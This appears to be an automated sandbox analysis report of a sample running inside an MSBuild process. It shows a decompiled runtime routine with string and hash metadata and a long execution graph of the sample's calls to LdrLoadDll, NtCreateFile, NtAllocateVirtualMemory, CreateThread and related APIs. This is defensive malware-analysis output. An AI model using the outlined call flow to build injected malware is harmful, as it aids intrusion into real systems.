				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E010ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01135720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01135720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                0x0113fdda
                                                                                                0x0113fde2
                                                                                                0x0113fde5
                                                                                                0x0113fdec
                                                                                                0x0113fdfa
                                                                                                0x0113fdff
                                                                                                0x0113fe0a
                                                                                                0x0113fe0f
                                                                                                0x0113fe17
                                                                                                0x0113fe1e
                                                                                                0x0113fe19
                                                                                                0x0113fe19
                                                                                                0x0113fe19
                                                                                                0x0113fe20
                                                                                                0x0113fe21
                                                                                                0x0113fe22
                                                                                                0x0113fe25
                                                                                                0x0113fe40

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113FDFA
                                                                                                Strings
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0113FE2B
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0113FE01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                • API String ID: 885266447-3903918235
                                                                                                • Opcode ID: 91cb17781c880da99ee9745c343fcd2dbde8724a6ba93118884fd9cd5b4f935c
                                                                                                • Instruction ID: a1a59fef2ab4ed6bf6fa36018c407a95dec12aa6626037815be9e60c19d32031
                                                                                                • Opcode Fuzzy Hash: 91cb17781c880da99ee9745c343fcd2dbde8724a6ba93118884fd9cd5b4f935c
                                                                                                • Instruction Fuzzy Hash: B3F0F672640602BFEB291A46DC06F63BF5BEB84B70F150314F6685A1E1DA62F82096F1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.3%
                                                                                                Dynamic/Decrypted Code Coverage:1.4%
                                                                                                Signature Coverage:2%
                                                                                                Total number of Nodes:1130
                                                                                                Total number of Limit Nodes:132
                                                                                                execution_graph 27125 29d148d 27128 29cdeb0 27125->27128 27129 29cded6 27128->27129 27136 29ba0e0 27129->27136 27131 29cdee2 27132 29cdf10 27131->27132 27144 29b90f0 27131->27144 27176 29cca90 27132->27176 27179 29ba030 27136->27179 27138 29ba0ed 27139 29ba0f4 27138->27139 27191 29b9fd0 27138->27191 27139->27131 27145 29b910a 27144->27145 27656 29bb620 27145->27656 27147 29b9129 27660 29bb370 27147->27660 27149 29b915e 27156 29b9165 27149->27156 27703 29bb2a0 LdrLoadDll 27149->27703 27152 29b91d5 27153 29ce3f0 2 API calls 27152->27153 27174 29b941d 27152->27174 27154 29b91eb 27153->27154 27155 29ce3f0 2 API calls 27154->27155 27157 29b91fc 27155->27157 27156->27174 27664 29be310 27156->27664 27158 29ce3f0 2 API calls 27157->27158 27159 29b920d 27158->27159 27676 29bc8a0 27159->27676 27161 29b921a 27162 29c73b0 10 API calls 27161->27162 27163 29b922b 27162->27163 27164 29c73b0 10 API calls 27163->27164 27165 29b923c 27164->27165 27166 29b9260 27165->27166 27167 29c73b0 10 API calls 27165->27167 27168 29c73b0 10 API calls 27166->27168 27175 29b92a8 27166->27175 27169 29b9259 27167->27169 27171 29b9277 27168->27171 27704 29bc9f0 LdrLoadDll 27169->27704 27171->27175 27705 29bd390 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 27171->27705 27174->27132 27175->27174 27688 29b8d70 27175->27688 27177 29cd3b0 LdrLoadDll 27176->27177 27178 29ccaaf 27177->27178 27210 29cb030 27179->27210 27183 29ba056 27183->27138 27184 29ba04c 27184->27183 27217 29cd760 27184->27217 27186 29ba093 27186->27183 27228 29b9e70 27186->27228 27188 29ba0b3 27234 29b98d0 LdrLoadDll 27188->27234 27190 29ba0c5 27190->27138 27631 29cda50 27191->27631 27194 29cda50 LdrLoadDll 27195 29b9ffb 27194->27195 27196 29cda50 LdrLoadDll 27195->27196 27197 29ba011 27196->27197 27198 29be0d0 27197->27198 27199 29be0e9 27198->27199 27639 29bb4a0 27199->27639 27201 29be0fc 27643 29cc5c0 27201->27643 27205 29be122 27209 29be14d 27205->27209 27649 29cc640 27205->27649 27207 29cc870 2 API calls 27208 29ba105 27207->27208 27208->27131 27209->27207 27211 29cb03f 27210->27211 27235 29c77c0 27211->27235 27213 29ba043 27214 29caef0 27213->27214 27241 29cc9e0 27214->27241 27218 29cd779 27217->27218 27248 29c73b0 27218->27248 27220 29cd791 27221 29cd79a 27220->27221 27287 29cd5a0 27220->27287 27221->27186 27223 29cd7ae 27223->27221 27304 29cc2e0 27223->27304 27609 29b76a0 27228->27609 27230 29b9e91 27230->27188 27231 29b9e8a 27231->27230 27622 29b7960 27231->27622 27234->27190 27236 29c77da 27235->27236 27237 29c77ce 27235->27237 27236->27213 27237->27236 27240 29c7c40 LdrLoadDll 27237->27240 27239 29c792c 27239->27213 27240->27239 27244 29cd3b0 27241->27244 27243 29caf05 27243->27184 27245 29cd435 27244->27245 27247 29cd3bf 27244->27247 27245->27243 27246 29c77c0 LdrLoadDll 27246->27245 27247->27245 27247->27246 27249 29c76f3 27248->27249 27250 29c73c4 27248->27250 27249->27220 27250->27249 27312 29cc030 27250->27312 27253 29c74d8 27315 29cc840 27253->27315 27254 29c74f5 27318 29cc740 27254->27318 27257 29c74e2 27257->27220 27258 29c751c 27259 29ce310 2 API calls 27258->27259 27263 29c7528 27259->27263 27260 29c76b7 27261 29cc870 2 API calls 27260->27261 27264 29c76be 27261->27264 27262 29c76cd 27375 29c70d0 27262->27375 27263->27257 27263->27260 27263->27262 27267 29c75c0 27263->27267 27264->27220 27266 29c76e0 27266->27220 27268 29c7627 27267->27268 27270 29c75cf 27267->27270 27268->27260 27269 29c763a 27268->27269 27414 29cc6c0 27269->27414 27272 29c75e8 27270->27272 27273 29c75d4 27270->27273 27274 29c75ed 27272->27274 27275 29c7605 27272->27275 27413 29c6f90 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27273->27413 27321 29c7030 27274->27321 27275->27264 27333 29c6d50 27275->27333 27278 29c75de 27278->27220 27281 29c75fb 27281->27220 27283 29c769a 27418 29cc870 27283->27418 27285 29c761d 27285->27220 27286 29c76a6 27286->27220 27288 29cd5bb 27287->27288 27289 29cd5cd 27288->27289 27447 29ce290 27288->27447 27289->27223 27291 29cd5ed 27450 29c69a0 27291->27450 27293 29cd610 27293->27289 27294 29c69a0 3 API calls 27293->27294 27296 29cd632 27294->27296 27296->27289 27482 29c7d10 27296->27482 27297 29cd6ba 27298 29cd6ca 27297->27298 27577 29cd330 LdrLoadDll 27297->27577 27493 29cd1a0 27298->27493 27301 29cd6f8 27572 29cc2a0 27301->27572 27305 29cc2fc 27304->27305 27306 29cd3b0 LdrLoadDll 27304->27306 27603 442967a 27305->27603 27306->27305 27307 29cc317 27309 29ce310 27307->27309 27606 29cca50 27309->27606 27311 29cd809 27311->27186 27313 29cd3b0 LdrLoadDll 27312->27313 27314 29c74a9 27313->27314 27314->27253 27314->27254 27314->27257 27316 29cc85c NtDeleteFile 27315->27316 27317 29cd3b0 LdrLoadDll 27315->27317 27316->27257 27317->27316 27319 29cc75c NtCreateFile 27318->27319 27320 29cd3b0 LdrLoadDll 27318->27320 27319->27258 27320->27319 27322 29c704c 27321->27322 27323 29cc6c0 LdrLoadDll 27322->27323 27324 29c706d 27323->27324 27325 29c7088 27324->27325 27326 29c7074 27324->27326 27327 29cc870 2 API calls 27325->27327 27328 29cc870 2 API calls 27326->27328 27329 29c7091 27327->27329 27330 29c707d 27328->27330 27421 29ce430 27329->27421 27330->27281 27332 29c709c 27332->27281 27334 29c6dce 27333->27334 27335 29c6d9b 27333->27335 27336 29c6f19 27334->27336 27341 29c6dea 27334->27341 27337 29cc6c0 LdrLoadDll 27335->27337 27338 29cc6c0 LdrLoadDll 27336->27338 27339 29c6db6 27337->27339 27345 29c6f34 27338->27345 27340 29cc870 2 API calls 27339->27340 27342 29c6dbf 27340->27342 27343 29cc6c0 LdrLoadDll 27341->27343 27342->27285 27344 29c6e05 27343->27344 27347 29c6e0c 27344->27347 27348 29c6e21 27344->27348 27440 29cc700 LdrLoadDll 27345->27440 27350 29cc870 2 API calls 27347->27350 27351 29c6e3c 27348->27351 27352 29c6e26 27348->27352 27349 29c6f6e 27354 29cc870 2 API calls 27349->27354 27355 29c6e15 27350->27355 27353 29c6e41 27351->27353 27428 29ce3f0 27351->27428 27356 29cc870 2 API calls 27352->27356 27357 29c6e53 27353->27357 27431 29cc7f0 27353->27431 27358 29c6f79 27354->27358 27355->27285 27359 29c6e2f 27356->27359 27357->27285 27358->27285 27359->27285 27362 29c6ea7 27363 29c6ebe 27362->27363 27439 29cc680 LdrLoadDll 27362->27439 27364 29c6eda 27363->27364 27365 29c6ec5 27363->27365 27368 29cc870 2 API calls 27364->27368 27367 29cc870 2 API calls 27365->27367 27367->27357 27369 29c6ee3 27368->27369 27370 29c6f0f 27369->27370 27434 29ce110 27369->27434 27370->27285 27372 29c6efa 27373 29ce310 2 API calls 27372->27373 27374 29c6f03 27373->27374 27374->27285 27376 29cc6c0 LdrLoadDll 27375->27376 27377 29c710e 27376->27377 27378 29c712c 27377->27378 27379 29c7117 27377->27379 27381 29c719a 27378->27381 27382 29c7150 27378->27382 27380 29cc870 2 API calls 27379->27380 27393 29c7120 27380->27393 27383 29c719f 27381->27383 27384 29c71e0 27381->27384 27385 29cc7a0 2 API calls 27382->27385 27388 29cc7f0 2 API calls 27383->27388 27383->27393 27389 29c71f2 27384->27389 27392 29c736d 27384->27392 27386 29c7175 27385->27386 27387 29cc870 2 API calls 27386->27387 27387->27393 27390 29c71ca 27388->27390 27391 29c71f7 27389->27391 27402 29c7232 27389->27402 27394 29cc870 2 API calls 27390->27394 27395 29cc7a0 2 API calls 27391->27395 27392->27393 27397 29cc870 2 API calls 27392->27397 27393->27266 27398 29c71d3 27394->27398 27396 29c721a 27395->27396 27399 29cc870 2 API calls 27396->27399 27400 29c739e 27397->27400 27398->27266 27403 29c7223 27399->27403 27400->27266 27401 29c7237 27401->27393 27404 29cc7a0 2 API calls 27401->27404 27402->27401 27408 29c7316 27402->27408 27403->27266 27405 29c725a 27404->27405 27406 29cc870 2 API calls 27405->27406 27407 29c7265 27406->27407 27407->27266 27408->27393 27441 29cc7a0 27408->27441 27411 29cc870 2 API calls 27412 29c735e 27411->27412 27412->27266 27413->27278 27415 29c7682 27414->27415 27416 29cd3b0 LdrLoadDll 27414->27416 27417 29cc700 LdrLoadDll 27415->27417 27416->27415 27417->27283 27419 29cd3b0 LdrLoadDll 27418->27419 27420 29cc88c NtClose 27419->27420 27420->27286 27424 29cca10 27421->27424 27423 29ce44a 27423->27332 27425 29cd3b0 LdrLoadDll 27424->27425 27426 29cca2c RtlAllocateHeap 27425->27426 27426->27423 27429 29cca10 2 API calls 27428->27429 27430 29ce408 27429->27430 27430->27353 27432 29cd3b0 LdrLoadDll 27431->27432 27433 29cc80c NtReadFile 27432->27433 27433->27362 27435 29ce11d 27434->27435 27436 29ce134 27434->27436 27435->27436 27437 29ce3f0 2 API calls 27435->27437 27436->27372 27438 29ce14b 27437->27438 27438->27372 27439->27363 27440->27349 27442 29cd3b0 LdrLoadDll 27441->27442 27443 29cc7bc 27442->27443 27446 4429560 LdrInitializeThunk 27443->27446 27444 29c7355 27444->27411 27446->27444 27578 29cc920 27447->27578 27449 29ce2bd 27449->27291 27451 29c69b1 27450->27451 27452 29c69b9 27450->27452 27451->27293 27453 29c6c8c 27452->27453 27581 29cf480 27452->27581 27453->27293 27455 29c6a0d 27456 29cf480 2 API calls 27455->27456 27459 29c6a18 27456->27459 27457 29c6a66 27460 29cf480 2 API calls 27457->27460 27459->27457 27461 29cf5b0 3 API calls 27459->27461 27595 29cf520 LdrLoadDll RtlAllocateHeap RtlFreeHeap 27459->27595 27463 29c6a7a 27460->27463 27461->27459 27462 29c6ad7 27464 29cf480 2 API calls 27462->27464 27463->27462 27586 29cf5b0 27463->27586 27465 29c6aed 27464->27465 27467 29c6b2a 27465->27467 27469 29cf5b0 3 API calls 27465->27469 27468 29cf480 2 API calls 27467->27468 27470 29c6b35 27468->27470 27469->27465 27471 29cf5b0 3 API calls 27470->27471 27478 29c6b6f 27470->27478 27471->27470 27474 29cf4e0 2 API calls 27475 29c6c6e 27474->27475 27476 29cf4e0 2 API calls 27475->27476 27477 29c6c78 27476->27477 27479 29cf4e0 2 API calls 27477->27479 27592 29cf4e0 27478->27592 27480 29c6c82 27479->27480 27481 29cf4e0 2 API calls 27480->27481 27481->27453 27483 29c7d21 27482->27483 27484 29c73b0 10 API calls 27483->27484 27489 29c7d37 27484->27489 27485 29c7d40 27485->27297 27486 29c7d77 27487 29ce310 2 API calls 27486->27487 27488 29c7d88 27487->27488 27488->27297 27489->27485 27489->27486 27490 29c7dc3 27489->27490 27491 29ce310 2 API calls 27490->27491 27492 29c7dc8 27491->27492 27492->27297 27494 29cd1b4 27493->27494 27495 29cd030 LdrLoadDll 27493->27495 27596 29cd030 27494->27596 27495->27494 27497 29cd1bd 27498 29cd030 LdrLoadDll 27497->27498 27499 29cd1c6 27498->27499 27500 29cd030 LdrLoadDll 27499->27500 27501 29cd1cf 27500->27501 27502 29cd030 LdrLoadDll 27501->27502 27503 29cd1d8 27502->27503 27504 29cd030 LdrLoadDll 27503->27504 27505 29cd1e1 27504->27505 27506 29cd030 LdrLoadDll 27505->27506 27507 29cd1ed 27506->27507 27508 29cd030 LdrLoadDll 27507->27508 27509 29cd1f6 27508->27509 27510 29cd030 LdrLoadDll 27509->27510 27511 29cd1ff 27510->27511 27512 29cd030 LdrLoadDll 27511->27512 27513 29cd208 27512->27513 27514 29cd030 LdrLoadDll 27513->27514 27515 29cd211 27514->27515 27516 29cd030 LdrLoadDll 27515->27516 27517 29cd21a 27516->27517 27518 29cd030 LdrLoadDll 27517->27518 27519 29cd226 27518->27519 27520 29cd030 LdrLoadDll 27519->27520 27521 29cd22f 27520->27521 27522 29cd030 LdrLoadDll 27521->27522 27523 29cd238 27522->27523 27524 29cd030 LdrLoadDll 27523->27524 27525 29cd241 27524->27525 27526 29cd030 LdrLoadDll 27525->27526 27527 29cd24a 27526->27527 27528 29cd030 LdrLoadDll 27527->27528 27529 29cd253 27528->27529 27530 29cd030 LdrLoadDll 27529->27530 27531 29cd25f 27530->27531 27532 29cd030 LdrLoadDll 27531->27532 27533 29cd268 27532->27533 27534 29cd030 LdrLoadDll 27533->27534 27535 29cd271 27534->27535 27536 29cd030 LdrLoadDll 27535->27536 27537 29cd27a 27536->27537 27538 29cd030 LdrLoadDll 27537->27538 27539 29cd283 27538->27539 27540 29cd030 LdrLoadDll 27539->27540 27541 29cd28c 27540->27541 27542 29cd030 LdrLoadDll 27541->27542 27543 29cd298 27542->27543 27544 29cd030 LdrLoadDll 27543->27544 27545 29cd2a1 27544->27545 27546 29cd030 LdrLoadDll 27545->27546 27547 29cd2aa 27546->27547 27548 29cd030 LdrLoadDll 27547->27548 27549 29cd2b3 27548->27549 27550 29cd030 LdrLoadDll 27549->27550 27551 29cd2bc 27550->27551 27552 29cd030 LdrLoadDll 27551->27552 27553 29cd2c5 27552->27553 27554 29cd030 LdrLoadDll 27553->27554 27555 29cd2d1 27554->27555 27556 29cd030 LdrLoadDll 27555->27556 27557 29cd2da 27556->27557 27558 29cd030 LdrLoadDll 27557->27558 27559 29cd2e3 27558->27559 27560 29cd030 LdrLoadDll 27559->27560 27561 29cd2ec 27560->27561 27562 29cd030 LdrLoadDll 27561->27562 27563 29cd2f5 27562->27563 27564 29cd030 LdrLoadDll 27563->27564 27565 29cd2fe 27564->27565 27566 29cd30a 27565->27566 27567 29cd030 LdrLoadDll 27565->27567 27568 29cd030 LdrLoadDll 27566->27568 27567->27566 27569 29cd313 27568->27569 27570 29cd030 LdrLoadDll 27569->27570 27571 29cd31c 27570->27571 27571->27301 27573 29cd3b0 LdrLoadDll 27572->27573 27574 29cc2bc 27573->27574 27602 4429860 LdrInitializeThunk 27574->27602 27575 29cc2d3 27575->27223 27577->27298 27579 29cc93c NtAllocateVirtualMemory 27578->27579 27580 29cd3b0 LdrLoadDll 27578->27580 27579->27449 27580->27579 27582 29cf496 27581->27582 27583 29cf490 27581->27583 27584 29ce3f0 2 API calls 27582->27584 27583->27455 27585 29cf4bc 27584->27585 27585->27455 27587 29cf520 27586->27587 27588 29cf57d 27587->27588 27589 29ce3f0 2 API calls 27587->27589 27588->27463 27590 29cf55a 27589->27590 27591 29ce310 2 API calls 27590->27591 27591->27588 27593 29c6c64 27592->27593 27594 29ce310 2 API calls 27592->27594 27593->27474 27594->27593 27595->27459 27597 29cd04b 27596->27597 27598 29c77c0 LdrLoadDll 27597->27598 27599 29cd06b 27598->27599 27600 29c77c0 LdrLoadDll 27599->27600 27601 29cd11f 27599->27601 27600->27601 27601->27497 27602->27575 27604 442968f LdrInitializeThunk 27603->27604 27605 4429681 27603->27605 27604->27307 27605->27307 27607 29cd3b0 LdrLoadDll 27606->27607 27608 29cca6c RtlFreeHeap 27607->27608 27608->27311 27610 29b76ab 27609->27610 27611 29b76b0 27609->27611 27610->27231 27612 29ce290 2 API calls 27611->27612 27619 29b76d5 27612->27619 27613 29b7738 27613->27231 27614 29cc2a0 2 API calls 27614->27619 27615 29b773e 27617 29b7764 27615->27617 27618 29cc9a0 2 API calls 27615->27618 27617->27231 27620 29b7755 27618->27620 27619->27613 27619->27614 27619->27615 27621 29ce290 2 API calls 27619->27621 27625 29cc9a0 27619->27625 27620->27231 27621->27619 27623 29b797e 27622->27623 27624 29cc9a0 2 API calls 27622->27624 27623->27188 27624->27623 27626 29cc9bc 27625->27626 27627 29cd3b0 LdrLoadDll 27625->27627 27630 44296e0 LdrInitializeThunk 27626->27630 27627->27626 27628 29cc9d3 27628->27619 27630->27628 27632 29cda73 27631->27632 27635 29bb150 27632->27635 27636 29bb174 27635->27636 27637 29bb1b0 LdrLoadDll 27636->27637 27638 29b9fea 27636->27638 27637->27638 27638->27194 27640 29bb4c3 27639->27640 27642 29bb540 27640->27642 27654 29cc070 LdrLoadDll 27640->27654 27642->27201 27644 29cd3b0 LdrLoadDll 27643->27644 27645 29be10b 27644->27645 27645->27208 27646 29ccbb0 27645->27646 27647 29cd3b0 LdrLoadDll 27646->27647 27648 29ccbcf LookupPrivilegeValueW 27647->27648 27648->27205 27650 29cd3b0 LdrLoadDll 27649->27650 27651 29cc65c 27650->27651 27655 4429910 LdrInitializeThunk 27651->27655 27652 29cc67b 27652->27209 27654->27642 27655->27652 27657 29bb647 27656->27657 27658 29bb4a0 LdrLoadDll 27657->27658 27659 29bb6aa 27658->27659 27659->27147 27661 29bb394 27660->27661 27706 29cc070 LdrLoadDll 27661->27706 27663 29bb3ce 27663->27149 27665 29be33c 27664->27665 27666 29bb620 LdrLoadDll 27665->27666 27667 29be34e 27666->27667 27707 29be1e0 27667->27707 27670 29be369 27672 29be374 27670->27672 27674 29cc870 2 API calls 27670->27674 27671 29be381 27673 29be392 27671->27673 27675 29cc870 2 API calls 27671->27675 27672->27152 27673->27152 27674->27672 27675->27673 27677 29bc8b6 27676->27677 27678 29bc8c0 27676->27678 27677->27161 27679 29bb4a0 LdrLoadDll 27678->27679 27680 29bc931 27679->27680 27681 29bb370 LdrLoadDll 27680->27681 27682 29bc945 27681->27682 27683 29bc968 27682->27683 27684 29bb4a0 LdrLoadDll 27682->27684 27683->27161 27685 29bc984 27684->27685 27686 29c73b0 10 API calls 27685->27686 27687 29bc9d9 27686->27687 27687->27161 27726 29be5d0 27688->27726 27690 29b90e1 27690->27174 27691 29b8d8a 27691->27690 27732 29c6ce0 27691->27732 27693 29cf480 2 API calls 27694 29b8f82 27693->27694 27696 29cf5b0 3 API calls 27694->27696 27695 29b8de6 27695->27690 27695->27693 27701 29b8f97 27696->27701 27697 29b76a0 4 API calls 27697->27701 27701->27690 27701->27697 27702 29b7960 2 API calls 27701->27702 27735 29bc5e0 27701->27735 27785 29be570 27701->27785 27789 29bdfe0 27701->27789 27702->27701 27703->27156 27704->27166 27705->27175 27706->27663 27708 29be1fa 27707->27708 27709 29be2b0 27707->27709 27710 29bb4a0 LdrLoadDll 27708->27710 27709->27670 27709->27671 27711 29be21c 27710->27711 27717 29cc320 27711->27717 27713 29be25e 27720 29cc360 27713->27720 27716 29cc870 2 API calls 27716->27709 27718 29cd3b0 LdrLoadDll 27717->27718 27719 29cc33c 27718->27719 27719->27713 27721 29cd3b0 LdrLoadDll 27720->27721 27722 29cc37c 27721->27722 27725 4429fe0 LdrInitializeThunk 27722->27725 27723 29be2a4 27723->27716 27725->27723 27727 29be5dd 27726->27727 27728 29c77c0 LdrLoadDll 27727->27728 27729 29be5f5 27728->27729 27730 29be5fc SetErrorMode 27729->27730 27731 29be603 27729->27731 27730->27731 27731->27691 27734 29c6d06 27732->27734 27803 29be3a0 27732->27803 27734->27695 27736 29bc5f9 27735->27736 27737 29bc5ff 27735->27737 27822 29bdcb0 27736->27822 27829 29b9bc0 27737->27829 27740 29bc60c 27741 29bc88b 27740->27741 27742 29cf5b0 3 API calls 27740->27742 27741->27701 27743 29bc628 27742->27743 27744 29bc63c 27743->27744 27745 29be570 2 API calls 27743->27745 27838 29cc0f0 27744->27838 27745->27744 27748 29bc766 27845 29bc580 LdrLoadDll LdrInitializeThunk 27748->27845 27749 29cc2e0 2 API calls 27750 29bc6ba 27749->27750 27750->27748 27755 29bc6c6 27750->27755 27752 29bc785 27753 29bc78d 27752->27753 27846 29bc4f0 LdrLoadDll NtClose LdrInitializeThunk 27752->27846 27756 29cc870 2 API calls 27753->27756 27754 29bc70f 27760 29cc870 2 API calls 27754->27760 27755->27741 27755->27754 27758 29cc3f0 2 API calls 27755->27758 27759 29bc797 27756->27759 27758->27754 27759->27701 27762 29bc72c 27760->27762 27761 29bc7af 27761->27753 27763 29bc7b6 27761->27763 27841 29cb750 27762->27841 27764 29bc7ce 27763->27764 27847 29bc470 LdrLoadDll LdrInitializeThunk 27763->27847 27848 29cc170 LdrLoadDll 27764->27848 27766 29bc743 27766->27741 27844 29b7b00 LdrLoadDll 27766->27844 27769 29bc7e2 27849 29bc2d0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27769->27849 27772 29bc75c 27772->27701 27773 29bc806 27774 29bc847 27773->27774 27850 29cc1a0 LdrLoadDll 27773->27850 27852 29cc200 LdrLoadDll 27774->27852 27777 29bc855 27779 29cc870 2 API calls 27777->27779 27778 29bc824 27778->27774 27851 29cc230 LdrLoadDll 27778->27851 27780 29bc85f 27779->27780 27781 29cc870 2 API calls 27780->27781 27783 29bc869 27781->27783 27783->27741 27853 29b7b00 LdrLoadDll 27783->27853 27786 29be583 27785->27786 27874 29cc270 27786->27874 27790 29be017 27789->27790 27791 29bdff7 27789->27791 27797 29be059 27790->27797 27900 29bdc30 27790->27900 27791->27790 27880 29bddf0 27791->27880 27795 29be08b 27798 29be0b1 27795->27798 27923 29caea0 12 API calls 27795->27923 27797->27795 27922 29bd5e0 12 API calls 27797->27922 27798->27701 27802 29c73b0 10 API calls 27802->27797 27804 29be3bd 27803->27804 27810 29cc3a0 27804->27810 27807 29be405 27807->27734 27811 29cc3bc 27810->27811 27812 29cd3b0 LdrLoadDll 27810->27812 27820 44299a0 LdrInitializeThunk 27811->27820 27812->27811 27813 29be3fe 27813->27807 27815 29cc3f0 27813->27815 27816 29cd3b0 LdrLoadDll 27815->27816 27817 29cc40c 27816->27817 27821 4429780 LdrInitializeThunk 27817->27821 27818 29be42e 27818->27734 27820->27813 27821->27818 27854 29bd660 27822->27854 27824 29ce3f0 2 API calls 27825 29bdde1 27824->27825 27825->27737 27827 29bdcce 27828 29bddd2 27827->27828 27863 29cb5d0 27827->27863 27828->27824 27831 29b9bdb 27829->27831 27830 29b9cfb 27830->27740 27831->27830 27832 29be1e0 3 API calls 27831->27832 27833 29b9cdc 27832->27833 27834 29b9d0a 27833->27834 27835 29b9cf1 27833->27835 27836 29cc870 2 API calls 27833->27836 27834->27740 27873 29b6cc0 LdrLoadDll 27835->27873 27836->27835 27839 29cd3b0 LdrLoadDll 27838->27839 27840 29bc690 27839->27840 27840->27741 27840->27748 27840->27749 27842 29be570 2 API calls 27841->27842 27843 29cb782 27842->27843 27843->27766 27844->27772 27845->27752 27846->27761 27847->27764 27848->27769 27849->27773 27850->27778 27851->27774 27852->27777 27853->27741 27855 29bd693 27854->27855 27869 29bb790 27855->27869 27857 29bd6a5 27858 29be3a0 3 API calls 27857->27858 27859 29bd6e8 27858->27859 27860 29bd6ef 27859->27860 27861 29ce430 2 API calls 27859->27861 27860->27827 27862 29bd6ff 27861->27862 27862->27827 27864 29cb5df 27863->27864 27865 29c77c0 LdrLoadDll 27864->27865 27866 29cb5f7 27865->27866 27867 29cb61d 27866->27867 27868 29cb60a CreateThread 27866->27868 27867->27828 27868->27828 27870 29bb7b7 27869->27870 27871 29bb4a0 LdrLoadDll 27870->27871 27872 29bb7f3 27871->27872 27872->27857 27873->27830 27875 29cd3b0 LdrLoadDll 27874->27875 27876 29cc28c 27875->27876 27879 4429840 LdrInitializeThunk 27876->27879 27877 29be5ae 27877->27701 27879->27877 27881 29bde20 27880->27881 27924 29c66c0 27881->27924 27883 29bde6e 27953 29c5530 27883->27953 27885 29bde74 27987 29c23a0 27885->27987 27887 29bde7a 28018 29c4590 27887->28018 27893 29bde8e 28062 29c5dd0 27893->28062 27895 29bde94 28086 29bfce0 27895->28086 27897 29bdeac 28101 29c0f80 27897->28101 27901 29bdc48 27900->27901 27905 29bdc9f 27900->27905 27902 29c11c0 10 API calls 27901->27902 27901->27905 27903 29bdc89 27902->27903 27903->27905 28397 29c1410 12 API calls 27903->28397 27905->27798 27906 29bda70 27905->27906 27907 29bda8c 27906->27907 27921 29bdb6b 27906->27921 27909 29cc870 2 API calls 27907->27909 27907->27921 27908 29bdc01 27910 29bdc1e 27908->27910 27912 29c73b0 10 API calls 27908->27912 27911 29bdaa7 27909->27911 27910->27797 27910->27802 28398 29bcf60 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27911->28398 27912->27910 27914 29bdbdb 27914->27908 28400 29bd130 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27914->28400 27916 29bdadf 27918 29bb4a0 LdrLoadDll 27916->27918 27919 29bdaf0 27918->27919 27920 29bb4a0 LdrLoadDll 27919->27920 27920->27921 27921->27908 28399 29bcf60 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27921->28399 27922->27795 27923->27798 27925 29c66e8 27924->27925 27926 29bb4a0 LdrLoadDll 27925->27926 27927 29c66fc 27926->27927 28106 29bcd20 27927->28106 27929 29c6736 27929->27883 27930 29c672f 27930->27929 27931 29bb4a0 LdrLoadDll 27930->27931 27932 29c675e 27931->27932 27933 29bb4a0 LdrLoadDll 27932->27933 27934 29c6782 27933->27934 28117 29bcde0 27934->28117 27936 29c67e8 27939 29bb4a0 LdrLoadDll 27936->27939 27937 29c67a6 27937->27936 27938 29c696b 27937->27938 28121 29c6410 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 27937->28121 27938->27883 27941 29c6808 27939->27941 27942 29bcde0 2 API calls 27941->27942 27945 29c682c 27942->27945 27943 29c6872 27944 29bcde0 2 API calls 27943->27944 27948 29c68a2 27944->27948 27945->27938 27945->27943 28122 29c6410 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 27945->28122 27947 29c68e8 27950 29bcde0 2 API calls 27947->27950 27948->27938 27948->27947 28123 29c6410 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 27948->28123 27952 29c6947 27950->27952 27952->27938 28124 29c6410 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 27952->28124 27954 29c5594 27953->27954 27955 29bb4a0 LdrLoadDll 27954->27955 27956 29c5661 27955->27956 27957 29bcd20 3 API calls 27956->27957 27959 29c5694 27957->27959 27958 29c569b 27958->27885 27959->27958 27960 29bb4a0 LdrLoadDll 27959->27960 27961 29c56c3 27960->27961 27962 29bcde0 2 API calls 27961->27962 27963 29c5703 27962->27963 27964 29c5832 27963->27964 27985 29c5823 27963->27985 28140 29c5320 27963->28140 27965 29cc870 2 API calls 27964->27965 27967 29c583c 27965->27967 27967->27885 27968 29c5738 27968->27964 27969 29c5743 27968->27969 27970 29ce3f0 2 API calls 27969->27970 27971 29c576c 